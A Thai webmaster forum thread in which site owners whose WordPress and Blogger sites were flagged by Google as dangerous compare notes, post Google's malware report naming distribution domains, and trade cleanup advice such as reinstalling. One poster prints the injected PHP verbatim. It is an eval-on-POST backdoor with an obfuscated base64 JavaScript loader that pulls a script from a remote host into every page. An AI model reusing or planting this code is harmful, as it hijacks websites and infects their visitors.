ต่อไป »

[ปิง^^]

โดน คำเตือน- การเข้าสู่เว็บไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ! ไม่ทราบว่าต้องแก้ยังไงเหรอครับ

[Dj.wayne_Gum]

ตรวจเว็บด่วนครับ
ของผมโดนไปรอบที่แล้ว pr หายเกลี้ยงเลย
เจอไวรัสเข้าไป

[thailand]

เป็นเหมือนผมเลยครับ

[Romme]

ตรวจเว็บด่วนครับ
ของผมโดนไปรอบที่แล้ว pr หายเกลี้ยงเลย
เจอไวรัสเข้าไป

น่ากลัวแหะ 

[kruttha]

เสียวเลย

[ปิง^^]

เจอสาเหตุแล้วครับ โดนฝังสคริป  ผมใช้ wordpress

/public_html      ไฟล์ index.php
/public_html      ไฟล์ wp-config.php
/public_html/wp-content  ไฟล์ index.php

แล้วก็ index ทุกหน้าที่มีในโฮสนะครับ

ตัวอย่าง โคด้ ที่โดนฝัง

โค๊ด:

<?php if(!function_exists('tmp_lkojfghx'))
{if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihKMlgxKXt2YXIgY1EyVTA9JyUnO3ZhciBqR3g9J3Zhci0yMGEtM2QtMjJTYy03MmlwdEVuZ2ktNmVlLTIyLTJjYi0zZC0yMlYtNjVyLTczaW8tNmUoKSstMjItMmNqLTNkLTIyLTIyLTJjdS0zZG5hLTc2LTY5Z2F0b3ItMmV1c2UtNzJBZ2VuLTc0LTNiLTY5ZigodS0yZWluZGV4T2YtMjgtMjJDaC03Mm9tZS0yMiktM2MwKS0yNi0yNi0yOC03NS0yZWluZGV4T2YtMjgtMjJXLTY5LTZlLTIyKS0zZTApLTI2LTI2KHUtMmVpLTZlZC02NXgtNGZmKC0yMi00ZVQtMjAtMzYtMjIpLTNjLTMwLTI5LTI2LTI2KC02NC02ZmN1LTZkLTY1LTZldC0yZS02M29vay02OWUtMmUtNjktNmUtNjRleE8tNjYoLTIybWllay0zZDEtMjItMjktM2MwKS0yNi0yNih0eS03MC02NW9mKHpydnp0cyktMjEtM2R0eXBlLTZmZigtMjItNDEtMjItMjkpKS03Yi03YXJ2enQtNzMtM2QtMjJBLTIyLTNiLTY1LTc2YWwoLTIyLTY5Zih3aW5kb3ctMmUtMjIrYSstMjItMjktNmEtM2RqKy0yMi0yYmErLTIyTWFqb3ItMjItMmJiLTJiYS0yYi0yMk1pbm9yLTIyLTJiYi0yYmEtMmItMjItNDItNzVpbGQtMjIrYi0yYi0yMi02YS0zYi0yMiktM2ItNjRvY3VtZW4tNzQtMmV3LTcyLTY5dC02NS0yOC0yMi0zYy03M2MtNzItNjlwdC0yMHNyYy0zZC0yZi0yZm0tNjEtNzItMjIrLTIydHUtN2EtMmVjbi0yZnZpZC0yZi0zZi02OWQtM2QtMjItMmJqKy0yMi0zZS0zYy01Yy0yZi03My02M3JpcHQtM2UtMjIpLTNiLTdkJztldmFsKHVuZXNjYXBlKGpHeC5yZXBsYWNlKEoyWDEsY1EyVTApKSl9KSgvXC0vZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#
<script(.*?)
</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>
\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&
($e||strpos($v,'fromCharCode')))||
($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- 
\n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output 
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo 
$s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

[limingxin]

เคยโดนมาแล้วและก็โดนประจำครับไม่รู้แก้ยังไงครับ ผู้รู้บอกวิธีแก้หน่อยครับทำยังครับ

[ปิง^^]

เคยโดนมาแล้วและก็โดนประจำครับไม่รู้แก้ยังไงครับ ผู้รู้บอกวิธีแก้หน่อยครับทำยังครับ

เปลี่ยนพาส จะหายมั้ยครับ

[D-N-A]

โดนไป 50 ก่าโดเมน  index,config แก้กันวุ่น 

[raon10]

โดนเหมือนกันครับ

 

[ปิง^^]

เคยโดนมาแล้วและก็โดนประจำครับไม่รู้แก้ยังไงครับ ผู้รู้บอกวิธีแก้หน่อยครับทำยังครับ

เปลี่ยนพาส จะหายมั้ยครับ

เปลี่ยนพาส ไปได้ 4 วัน โดนอีกแล้ว  รอบที่ 2  

[Step9]

มันจะกลายเป็นโรคประจำแล้ว
http://www.thaiseoboard.com/in...60804.msg764936.html#msg764936

[ttong]

เหอๆ โดนเหมือนกัน

เพิ่งรู้ตัววันนี้เอง 

[masterdmty]

วิธีเอาออกลองศึกษาจาก viruscom2.com ก็แล้วกันนะมีทั้งการเอาขึนและก็การเอาออกอ่ะหาดูให้ดีนะ

[kikoe8]

ผมก็โดนเหมือนกัน

ไอ้ตัวเดียวกันเนี่ยะแหล่ะ 

ใน web น่ะ  แต่ใน  Google ยังไม่หายน่ะ  // ยิ่งถ้าเป็น Web ของลูกค้าเดี่ยวค้าจะมาบ่น
ให้คุณฮีกรอบ    :-\

[badboyth]

กลัวๆๆๆๆ ไม่อยากเจอเลย

ถ้าเจอคงจะประสาทแน่ๆ 

[TKC]

เกิดอะไรขึ้นเมื่อ Google เยี่ยมชมไซต์นี้

    เรา ได้ทดสอบหน้าเว็บจำนวน 26 หน้าเป็นระยะเวลาเกินกว่า 90 วันที่ผ่านมา หน้าเว็บจำนวน 4 หน้า มีซอฟต์แวร์ที่เป็นอันตรายที่กำลังถูกดาวน์โหลดและติดตั้งโดยไม่ได้รับความ ยินยอมจากเจ้าของเครื่อง Google เข้าชมไซต์ครั้งล่าสุดเมื่อวันที่ 2009-05-26 และพบเนื้อหาต้องสงสัยครั้งล่าสุดเมื่อวันที่ 2009-05-26

    Malicious software includes 4 trojan(s), 4 exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine.

    ซอฟต์แวร์ที่เป็นอันตรายถูกโฮสต์ไว้ในโดเมนจำนวน 1 โดเมนรวมทั้ง

โค๊ด:

godcounter.org/

ด้วย

    โดเมนจำนวน 1 โดเมนทำงานเป็นเสมือนตัวกลางสำหรับแพร่กระจายมัลแวร์ที่สร้างปัญหาให้กับผู้เข้าชมไซต์นี้ รวมทั้ง

โค๊ด:

goodcounter.org/

ด้วย

    This site was hosted on 1 network(s) including

โค๊ด:

AS15169 (GOOGLE).

ของผมโดนแบบนี้ครับ ไม่รู้จะแก้ยังไง ผมใช้ Blogger ครับ

[!Man]

โดนกันเยอะเนอะ - -

[ปิง^^]

wp แก้ไม่อยากครับแต่ก็เหนื่อย แต่ถ้า smf เหนื่อยครับงานนี้
วิธีแก้ คือ ลงใหม่ดีกว่าครับ แล้วค่อย dump db เก่ากลับมาใช้

[แป้งฝุ่น~Richy~]

เคยเหมือนกัน